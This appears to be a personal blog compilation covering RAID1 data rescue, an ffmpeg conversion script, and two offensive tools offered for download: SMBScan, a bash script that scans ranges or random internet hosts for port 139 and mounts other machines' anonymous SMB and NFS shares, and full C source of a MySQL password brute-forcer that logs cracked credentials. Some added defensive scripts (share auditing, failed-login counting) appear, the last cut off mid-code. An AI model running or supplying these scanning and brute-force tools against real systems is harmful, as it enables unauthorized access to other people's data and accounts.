Rescue NFS Raid1 Data

Today I made a mistake: I deleted some data with rm -rf on my WDCloud Mirror Gen2 with RAID1 over my NFS.

To rescue it I must mount the RAID1 disk on my PC.

I tried to mount it (first I figured out the partition with gparted)

root@pc:~# mkdir -p /media/nfsdisk 
root@pc:~# mount /dev/sdb2 /media/
mount: unknown filesystem type 'linux_raid_member'

examine /dev/sdb2

root@pc:~# mdadm --examine /dev/sdb2
/dev/sdb2:
          Magic : c54a7cba
        Version : 1.0
    Feature Map : 0x1
     Array UUID : 4151f8f8:4151f8f8:4151f8f8:4151f8f8
           Name : 1
  Creation Time : Thu Nov 19 12:21:47 2015
     Raid Level : raid1
   Raid Devices : 2

 Avail Dev Size : 5852141296 (2790.52 GiB 2996.30 GB)
     Array Size : 2926070648 (2790.52 GiB 2996.30 GB)
   Super Offset : 5852141552 sectors
          State : clean
    Device UUID : 22f64ef8:4151f8f8:413abe12:34ac24a6

Internal Bitmap : 2 sectors from superblock
    Update Time : Mon Jul 18 20:57:32 2016
       Checksum : 11e885b1 - correct
         Events : 226


   Device Role : Active device 0
   Array State : A. ('A' == active, '.' == missing)

 

 

I tried to mount it with

root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/sdb2 is busy - skipping

 

but it did not work

root@pc:~# mdadm --stop /dev/md1
mdadm: stopped /dev/md1
root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/md1 has been started with 1 drive (out of 2).
root@pc:~# mount /dev/md1 /media/nfsdisk
root@pc:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 1,8T 0 disk 
├─sda1 8:1 0 931,4G 0 part 
├─sda2 8:2 0 2,8G 0 part [SWAP]
└─sda3 8:3 0 928,7G 0 part /home
sdb 8:16 0 2,7T 0 disk 
├─sdb1 8:17 0 2G 0 part 
├─sdb2 8:18 0 2,7T 0 part 
│ └─md1 9:1 0 2,7T 0 raid1 /media/nfsdisk
├─sdb3 8:19 0 1G 0 part 
└─sdb4 8:20 0 1G 0 part 
sdc 8:32 0 1,8T 0 disk 
└─sdc1 8:33 0 1,8T 0 part 
sdd 8:48 0 111,8G 0 disk 
└─sdd1 8:49 0 111,8G 0 part /
sde 8:64 0 119,2G 0 disk 
└─sde1 8:65 0 119,2G 0 part 
sr0 11:0 1 4,2G 0 rom
root@pc:~# mount | grep md1
/dev/md1 on /media/nfsdisk type ext4 (rw)

hint at the end

root@pc:~# mdadm --assemble --scan
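
When the goal is to get deleted files back, the array should be assembled and mounted read-only so that nothing is written over the freed blocks (the session above mounts it rw). The following is an added example, not part of the original post: it reads mdadm --examine output and prints a read-only plan as a dry run. The function names are hypothetical and the sample input is a constructed excerpt of the output shown above.

```bash
#!/bin/bash
# Added example: derive a read-only rescue plan from `mdadm --examine` output.
# Nothing here touches a disk; the plan is only printed (dry run).

# Constructed sample: an excerpt of the --examine output shown in the post.
sample_examine() {
  cat <<'EOF'
/dev/sdb2:
          Magic : c54a7cba
        Version : 1.0
     Raid Level : raid1
   Raid Devices : 2
          State : clean
         Events : 226
    Device Role : Active device 0
    Array State : A. ('A' == active, '.' == missing)
EOF
}

# raid_field NAME: print the value of one "Name : value" line read from stdin.
raid_field() {
  awk -F' : ' -v key="$1" '
    { k = $1; gsub(/^[ \t]+|[ \t]+$/, "", k) }
    k == key { v = $2; gsub(/^[ \t]+|[ \t]+$/, "", v); print v; exit }
  '
}

# missing_members: count the "." slots in the Array State map ("A." -> 1).
missing_members() {
  local state
  state=$(raid_field "Array State")
  state=${state%% *}                       # keep the map, drop the legend
  printf '%s' "$state" | tr -cd '.' | wc -c | tr -d ' '
}

# rescue_plan PART MD MOUNTPOINT: read --examine output on stdin and print the
# commands for a read-only assembly and mount. Returns 1 unless PART is raid1,
# because only a mirror member holds a complete copy of the file system.
rescue_plan() {
  local part=$1 md=$2 mnt=$3 examine level missing
  examine=$(cat)
  level=$(printf '%s\n' "$examine" | raid_field "Raid Level")
  if [ "$level" != "raid1" ]; then
    echo "refusing: $part is '$level', a single member is only usable for raid1" >&2
    return 1
  fi
  missing=$(printf '%s\n' "$examine" | missing_members)
  echo "# $part: $level, $missing member(s) missing -> start degraded, read-only"
  echo "mdadm --stop $md    # only needed after an 'is busy' error, as in the post"
  echo "mdadm --assemble --run --readonly $md $part"
  # noload skips the ext4 journal replay, which would need to write to the device
  echo "mount -o ro,noload $md $mnt"
}

sample_examine | rescue_plan /dev/sdb2 /dev/md1 /media/nfsdisk
```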

 

video 2 mp4 converter

I created a new script for movie-to-mp4 conversion

features:

* save metadata
* save creation date
* delete the larger files if you want

#!/bin/bash
# 
# converter for video files to mp4
# this script can also delete the larger file of each pair if you want
# please take care with DELETE_FILES = yes
# double check your output first if the quality is good enough for you
# this script keeps the metadata and the creation date of the file
#
# written 2016/07/17 by Daniel Gohlke to clean up my NAS
#
# you need ffmpeg and some codecs, if i forget something please update this script
# sudo apt-get install libavcodec-extra-53 libavutil-extra-51 libavformat-extra-53 libx264-146 ffmpeg
# change what ever you need

EXTENSION_NEW="mp4"
DELETE_FILES="no"
DEFAULT_CRF="22" # some kind of medium
OUTPUT_DIR="output"

read -p "Please enter CRF Quality / higher value is lower quality [51 worst .. 0 lossless (default $DEFAULT_CRF) ]: " CRF
CRF=${CRF:-$DEFAULT_CRF}
echo "convert with CRF $CRF"


# error handling
function finish {
  # FILENAME is only set once a conversion has started
  if [ -n "$FILENAME" ]; then
    echo "some error occurred, cleanup file $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
    echo "Error on line $1"
    rm -f "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
  else
    echo "User Break, leave $d untouched"
  fi
  rm -f "$OUTPUT_DIR/filelist.txt"
}

# Trap if something failed
trap 'finish $LINENO' ERR
#trap 'finish $LINENO' EXIT


function start_convert {

  mkdir -p "$OUTPUT_DIR"
  find . -type f \( ! -iname "filelist.txt" \) | grep -v "$OUTPUT_DIR" > "$OUTPUT_DIR/filelist.txt"
  # read the list line by line so file names with spaces stay in one piece
  while IFS= read -r d; do
    echo "converting with crf $CRF $d"
    FILENAME=$(basename "$d")
    EXTENSION="${FILENAME##*.}"
    FILENAME="${FILENAME%.*}"

    # convert (stdin from /dev/null so ffmpeg does not consume the file list)
    ffmpeg -stats -i "$d" -c:v h264 -strict experimental -crf "$CRF" -map_metadata 0 "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW" < /dev/null

    # apply the original file's timestamps to the new file
    touch -r "$d" "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
    # use the full path $d, the source may sit in a subdirectory
    FILESIZE_OLD=$(stat -c%s "$d")
    FILESIZE_NEW=$(stat -c%s "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW")
#    echo $FILESIZE_OLD
#    echo $FILESIZE_NEW

    if [ "$DELETE_FILES" == "yes" ]; then
      echo "delete greater files is turned on"

      if [ "$FILESIZE_OLD" -ge "$FILESIZE_NEW" ]; then
        echo "delete $d"
        rm -f -- "$d"
      else
        echo "delete $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
        rm -f -- "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
      fi

    else
      echo "delete greater files is turned off"
    fi

  done < "$OUTPUT_DIR/filelist.txt"

  rm -f "$OUTPUT_DIR/filelist.txt"
  exit 0
}

#ffmpeg -stats -i 0621232021DVB-TDasErste.m4v -c:v h264 -strict experimental -crf 20 -map_metadata 0  FILENAMEdefaultcrf20.mp4

# Start Program
read -p "Do you wish to start convert your videos? (y/n)" yn
case $yn in
  [Yy]* ) start_convert;;
  [Nn]* ) exit;;
   * ) echo "Please answer yes(y) or no(n).";;
esac

 

link to github: https://github.com/danielgohlke/scripts/blob/master/converttomp4.sh

 

 

SMBScan version 1.2

Simple SMB scanner written in Bash for Linux, for newer systems with zmap support
smbscan-1.2.tar.gz
(Download all) for new systems (2015) with zmap and so on
– added zmap support
– replaced smbmount with mount
– removed dialog and whiptail

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
MNT=/bin/mount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
ZMAP=/usr/sbin/zmap
CHARSET="iso8859-1"
TIMEOUT=2
usage() { echo "Usage: $0 [-z number of hosts (zmap)] [-n ip/range (nmap)]" 1>&2; exit 1; }

while getopts "n:z:" opt; do
  case "$opt" in
    n)
      echo "using nmap with ${OPTARG}" >&2
      NMAPSCAN=1
      test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
      IP=${OPTARG}
      ;;
    
    z)
      echo "using zmap with ${OPTARG} hosts" >&2
      ZMAPSCAN=1
      test -x $ZMAP || { echo -e 'zmap not found !';exit 1; }
      z=${OPTARG}
      ;;
    h)
      echo "Invalid option: -$OPTARG" >&2
      usage
      ;;
    *)
      echo "Option -$OPTARG requires an argument. " >&2
      usage
      exit 1
      ;;
  esac

done

if [ -z $ZMAPSCAN ] && [ -z $NMAPSCAN ]; then
   usage
fi

shift $((OPTIND-1))


test -x $MNT || { echo -e 'mount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }


function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
        echo "Written by cd ;)"
        echo "Scan started against to $1 on port 139"
        echo "This can take a while"


if [ "$NMAPSCAN" = 1 ] 
    then
          echo "search via nmap at ip/range ${n} for hosts who has opened port 139"
      $NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
      cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
else
          echo "search via zmap for ${z} hosts who has opened port 139"
      $ZMAP -N ${z} -p 139 -B 1M -q -o ./out 
          sed -i '1d' ./out #delete first line "saddr" for csv
fi
shift $((OPTIND-1))

    
rm -f ./$IP.out
check_it

if [ $SUM = 0 ]
    then 
    echo "Sorry
    No SMB Server found !
        
      Thanks for use ... "
   rm -f ./out
   exit 1
fi

    echo "Please wait...
      Searching 4 Shared Directories"
while read host ;
    do
    # Get Computer name
    echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
    name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

    # Get Workgroup name
    workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

    # if name not set so use this one
    workgroup=${workgroup:=WORKGROUP}

    name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
    echo "Searching name via nmblookup (M)"
    name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
    echo "Searching Name via nmblookup (H)"
    name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
    echo "Searching Name via Smbclient ... using Servername"
    name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}


    
    # search for shared folders
    echo "looking for shared directorys on $host"
    # kill old sleep process
    kill -9 `pidof sleep` 2&>1
    $SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
    sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1
        
        exist=0
        while read LIST ;
                do
            exist=1
            #make directory for the shares
            mkdir -p ./"$name-$host/$LIST"
            #add a logfile
            #touch ./"$name-$host/ip-is-$host"
                    $MNT -t cifs -o guest,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t cifs -o user=nobody,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t nfs $host:/$LIST ./$name-$host/$LIST


        echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
        if [ $exist = 1 ]
        then
            #write some useful or not very useful informations into a log 
            echo " 
            $name - $host
            Last found: `date`
            Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
        fi
        done < ./$host.shares

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
    echo "
SMBScan v 1.2 -> listing mounted smb file systems

`cat ./mounts | more`
"
rm -f ./mounts
rm -f ./out

umountall.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount -f */*
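
The scanner mounts whatever a guest session is allowed to see (smbclient -N, mount -o guest). To check a Samba server of your own for such shares, here is an added example that is not part of SMBScan: it reads an smb.conf and lists every share with guest access enabled. The sample configuration, its share names and the function guest_shares are constructed for illustration.

```bash
#!/bin/bash
# Added example: list Samba shares that a guest (no password) session may use.

# Constructed sample smb.conf; share names, paths and the user are made up.
sample_smb_conf() {
  cat <<'EOF'
[global]
   workgroup = WORKGROUP

[media]
   path = /srv/media
   guest ok = yes
   read only = yes

; scanner drop folder
[scans]
   path = /srv/scans
   public = yes
   writable = yes

[backup]
   path = /srv/backup
   valid users = daniel
EOF
}

# guest_shares: read smb.conf on stdin and print "share access" for every
# share with guest access enabled ("guest ok" or its synonym "public").
# Access is read-only unless the share sets writable/writeable/write ok = yes
# or read only = no (Samba shares are read-only by default).
guest_shares() {
  awk '
    function truthy(v) { v = tolower(v); return v == "yes" || v == "true" || v == "1" }
    function emit() {
      if (sec != "" && sec != "global" && guest)
        print sec, (writable ? "read-write" : "read-only")
    }
    /^[ \t]*[#;]/ { next }                      # comment lines
    /^[ \t]*\[.*\]/ {                           # section header starts a new share
      emit()
      sec = $0; sub(/^[ \t]*\[/, "", sec); sub(/\].*$/, "", sec)
      sec = tolower(sec); guest = 0; writable = 0
      next
    }
    index($0, "=") {                            # key = value line
      key = tolower(substr($0, 1, index($0, "=") - 1))
      val = substr($0, index($0, "=") + 1)
      gsub(/^[ \t]+|[ \t]+$/, "", key); gsub(/[ \t]+/, " ", key)
      gsub(/^[ \t]+|[ \t]+$/, "", val)
      if (key == "guest ok" || key == "public") guest = truthy(val)
      if (key == "writable" || key == "writeable" || key == "write ok") writable = truthy(val)
      if (key == "read only") writable = !truthy(val)
    }
    END { emit() }
  '
}

sample_smb_conf | guest_shares
```

Every share it prints should either be meant to be public or get guest ok = no.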

Samba / Netbios network scanner (SMBScan) for Linux

Simple SMB scanner written in Bash for Linux, for older systems

smbscan-1.1.tar (Download all) for older systems (anno 2006)

smbscan.sh

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
#rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
SMBM=/usr/bin/smbmount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
DIALOG=/usr/bin/dialog
#WHIP=/usr/bin/whiptail
CHARSET="iso8859-1"
# BUNT 1 = Console
# BUNT 0 = with Whiptail or dialog graphics
BUNT=1
TIMEOUT=5

#test -x $WHIP
test -x $DIALOG && DIALOG=$DIALOG
#test -x $WHIP || BUNT=0
test -x $SMBM || { echo -e 'smbmount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }
# hehe i know that suxx ;)
clear

function script_kiddie() {
if [ $BUNT -eq 1 ]
then
    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.1"
	else
	    $DIALOG --title "v 1.1" --infobox " ScR1p7k1dDi3 Pr0t3c7 Sy5t3m" 6 20
fi
exit 1 
}
script_kiddie

if [ $# -eq 1 ]
then
    echo "$1" > ./out
        else
	    $DIALOG --title "SMBscan v.1.1" --inputbox "                Written by cd ;)

Please enter IP range
e.g 10.0.0.1-24 or 10.0.1-255.5-30
or type ./smbscan 10.0.0.1-254

http://www.bastardo.de <- get newest version" 13 50 2> ./out
fi

function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
if [ $BUNT -eq 1 ]
    then
#	test -e $1 || { echo -e "$0 [ip room]"; exit 1; }
	    echo "Written by cd ;)"
	    echo "Scan started against to $1 on port 139"
	    echo "This can take a while"
fi

check_it
IP=`cat ./out`
rm -f ./out
# i think that is the fastest, we whant to scan only 1 port ... not more 
$NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
rm -f ./$IP.out
check_it
if [ $SUM = 0 ]
    then 
	if [ $BUNT -eq 1 ]
	    then
echo "
    No SMB Server found.

      Thanks for use ..."
		rm -f ./out
		exit 1
		    else
			$DIALOG --title "Sorry" --infobox "
    No SMB Server found !

      Thanks for use ... " 7 30
			rm -f ./out
			exit 1
	fi
fi

if [ $BUNT -eq 1 ]
    then
	echo "Please wait...
      Searching 4 Shared Directories"
	else
	    $DIALOG --infobox "Please wait !
Searching 4 Shared Directories..." 5 40
fi
while read host ;
    do
	# Get Computer name
	echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
	name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

	# Get Workgroup name
	workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

	# if name not set so use this one
	workgroup=${workgroup:=WORKGROUP}

	name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
	echo "Searching name via nmblookup (M)"
	name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
	echo "Searching Name via nmblookup (H)"
	name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
	echo "Searching Name via Smbclient ... using Servername"
	name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}

	# search for shared folders
	echo "looking for shared directorys on $host"
	# kill old sleep process
	kill -9 `pidof sleep` 2&>1
	$SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
	sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1

	    exist=0
	    while read LIST ;
	    		do
		    exist=1
		    #make directory for the shares
		    mkdir -p ./"$name-$host/$LIST"
		    #add a logfile
		    #touch ./"$name-$host/ip-is-$host"
		    $SMBM "//$host/$LIST" "./$name-$host/$LIST" -o defaults,guest,iocharset=utf8

			if [ $BUNT -eq 1 ]
			    then
				echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
			    else
				$DIALOG --infobox  "trying to mount //$host/$LIST into ./$name/$LIST" 10 60
			fi
		if [ $exist = 1 ]
		then
		    #write some useful or not very useful informations into a log 
		    echo " 
		    $name - $host
		    Last found: `date`
		    Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
		fi
	    done < ./$host.shares
#	    echo `mount | $GREP cifs | grep $host` >> ./"$name-$host/ip-is-$host"

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
if [ $BUNT -eq 1 ]
    then
	echo "
SMBScan v 1.1 -> listing mounted smb file systems

`cat ./mounts | more`
"
    else
	$DIALOG --title "SMBScan v 1.1 -> listing mounted smb file systems" --textbox mounts 10 60
fi
rm -f ./mounts
rm -f ./out

 

The unmount script

umount.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount */*/*
#umount `mount | grep smbfs | awk '{print $3}'`
kill -9 `ps aux | grep mount.cifs | awk '{print $2}'`

 

The Makefile for „make install“

PREFIX=/usr/sbin/
install:
	@cp smbscan.sh $(PREFIX)
	@cp umountall.sh $(PREFIX)

uninstall:
	@rm $(PREFIX)smbscan.sh
	@rm $(PREFIX)umountall.sh

 

 

MySQL Bruteforce for Linux and Windows

Linux Source and Binaries

mysql-bruteforce.c (source code)
mysql-bruteforce.tar (source code tarball)
mysql-bruteforce-binary-only.tar (compiled binary)
You need to install ncurses

apt-get install libncurses5-dev libncurses5

Windows Source and Binaries

mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows

Here is the Source (Linux)

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// German or English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben 
*   23.03 2010 by cd 
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   oder -O6 anstatt -O2
*  ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
*  log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for the people that understand no german change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the old good time MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

MYSQL *my;

int count=0;
char *passwd;

#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122  // 127 set end ascii cahr
#define BUFF_SIZE 1024
#define LEN 80

char buffer[BUFF_SIZE];
int jump=0;

int main (int argc, char *argv[])
{
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

switch(eingabe)
{
case 'b':
while(1)
{
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
next:
dummy=1;
}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
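
Seen from the server, a run of this tool is a burst of failed logins for one account from one client. The following is an added example, not part of the original program, that counts those failures per user and host in a MySQL error log. The log lines are constructed in the layout MySQL 5.7 writes with log_error_verbosity=3 (an assumption about the server), and failed_logins is a hypothetical name.

```bash
#!/bin/bash
# Added example: flag user/host pairs with many failed logins in a MySQL error log.

# Constructed sample log (MySQL 5.7 layout, log_error_verbosity=3 assumed).
# The addresses are documentation addresses from 192.0.2.0/24.
sample_error_log() {
  local i
  for i in 1 2 3 4 5 6; do
    echo "2016-07-18T20:57:0${i}.000000Z 4${i} [Note] Access denied for user 'root'@'192.0.2.10' (using password: YES)"
  done
  echo "2016-07-18T21:03:11.000000Z 51 [Note] Access denied for user 'app'@'192.0.2.20' (using password: YES)"
  echo "2016-07-18T21:04:00.000000Z 52 [Note] Aborted connection 52 to db: 'shop' user: 'app' host: '192.0.2.20' (Got an error reading communication packets)"
}

# failed_logins THRESHOLD: read an error log on stdin and print
# "count user host" for every user/host pair with at least THRESHOLD
# "Access denied" entries, highest count first.
failed_logins() {
  awk -v min="$1" -v q="'" '
    BEGIN { re = q "[^" q "]*" q "@" q "[^" q "]*" q }   # quoted user, @, quoted host
    /Access denied for user/ && match($0, re) {
      pair = substr($0, RSTART, RLENGTH)
      gsub(q, "", pair)                                  # strip the quotes
      split(pair, p, "@")
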